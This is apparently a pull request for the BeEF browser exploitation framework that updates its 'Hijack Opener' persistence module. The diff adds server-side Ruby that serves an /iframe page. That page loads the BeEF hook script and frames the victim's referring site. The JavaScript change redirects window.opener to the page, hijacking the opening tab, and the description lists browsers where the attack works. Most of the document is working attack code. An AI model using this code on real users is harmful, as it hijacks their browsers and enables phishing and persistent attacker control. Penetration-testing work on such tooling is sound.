### PR TITLE
Update Hijack Opener Window module to use server-side iframe loader

### DIFF
--- a/modules/persistence/hijack_opener/command.js
+++ b/modules/persistence/hijack_opener/command.js
@@ -6,10 +6,9 @@
 
 beef.execute(function() {
   var referrer = document.referrer;
-  var hook = beef.net.httpproto+"://"+beef.net.host+":"+beef.net.port+beef.net.hook;
   try {
     beef.debug("[Hijack Opener] Trying to hijack: " + referrer);
-    window.opener.location = 'data:text/html,<html><head><title>'+referrer+'</title><script src="'+hook+'"></'+'script><style>body {padding:0;margin:0}</style></head><body><iframe src="'+referrer+'" style="width:100%;height:100%;margin:0;padding:0;border:0"></iframe></body>';
+    window.opener.location = beef.net.httpproto + '://' + beef.net.host+ ':' + beef.net.port + '/iframe#' + referrer;
     beef.net.send("<%= @command_url %>", <%= @command_id %>, "success=hijacked window.opener.location", beef.are.status_success());
   } catch (e) {
     beef.debug("[Hijack Opener] could not hijack opener window: "+e.message)

--- a/modules/persistence/hijack_opener/config.yaml
+++ b/modules/persistence/hijack_opener/config.yaml
@@ -12,5 +12,5 @@ beef:
             description: "This module abuses window.location.opener to hijack the opening window, replacing it with a BeEF hook and 100% * 100% iframe containing the referring web page. Note that the iframe will be blank if the origin makes use of a restrictive X-Frame-Origin directive.<br/><br/>This attack will only work if the opener did not make use of the <i>noopener</i> and <i>noreferrer</i> directives. Refer to <a href='https://www.jitbit.com/alexblog/256-targetblank---the-most-underestimated-vulnerability-ever/'>Target=_blank - the most underestimated vulnerability ever</a> for more information."
             authors: ["bcoles"]
             target:
-                user_notify: ["FF"]
-                not_working: ["All"]
+                user_notify: ["All"]
+                not_working: ["O"]

--- a/modules/persistence/hijack_opener/module.rb
+++ b/modules/persistence/hijack_opener/module.rb
@@ -4,6 +4,26 @@
 # See the file 'doc/COPYING' for copying permission
 #
 class Hijack_opener < BeEF::Core::Command
+  def pre_send
+    config = BeEF::Core::Configuration.instance
+    hook_file = config.get('beef.http.hook_file')
+
+    src = '<html><head><title></title><style>body {padding:0;margin:0;border:0}</style></head>'
+    src << "<body><iframe id='iframe' style='width:100%;height:100%;margin:0;padding:0;border:0'></iframe>"
+    src << "<script src='#{hook_file}'></script>"
+    src << '<script>var url = window.location.hash.slice(1);'
+    src << 'if (url.match(/^https?:\/\//)) {'
+    src << 'document.title = url;'
+    src << 'document.getElementById("iframe").src = url;'
+    src << '}</script></body></html>'
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw(
+      '200',
+      {'Content-Type' => 'text/html'},
+      src,
+      '/iframe',
+      -1)
+  end
+
   def post_execute
     save({'result' => @datastore['result']})
   end


### PR DESCRIPTION
Update Hijack Opener Window module to use server-side iframe loader. Now works on most modern browsers (not Opera).

Tested (working):
* Firefox 49 on Windows
* Chrome 49 on Windows
* IE 8 on Windows
* Safari 5 on Windows
* SeaMonkey 2.39 on Windows
* Iceweasel 31 on Linux

Tested (not working):
* Opera 11 on Windows (returns `Security error: attempted to write protected variable`)
